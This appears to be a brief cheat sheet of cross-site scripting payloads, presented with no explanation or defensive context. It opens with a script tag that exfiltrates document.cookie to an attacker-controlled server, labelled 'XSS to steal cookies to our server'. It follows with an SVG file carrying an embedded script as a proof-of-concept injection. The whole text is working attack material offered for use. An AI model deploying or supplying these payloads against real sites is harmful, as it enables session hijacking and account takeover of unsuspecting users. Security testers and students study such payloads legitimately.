XSS to steal cookies to our server : <script>new Image().src="http://ourinternalip:1111/page.php?output="+document.cookie;</script>

Malicious SVG

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">
  <circle cx="100" cy="100" r="80" fill="lightblue" />
  <text x="50" y="110" font-family="Arial" font-size="20" fill="black">Hello, SVG!</text>
  <script type="text/javascript">
    alert('XSS in SVG!');
  </script>
</svg>

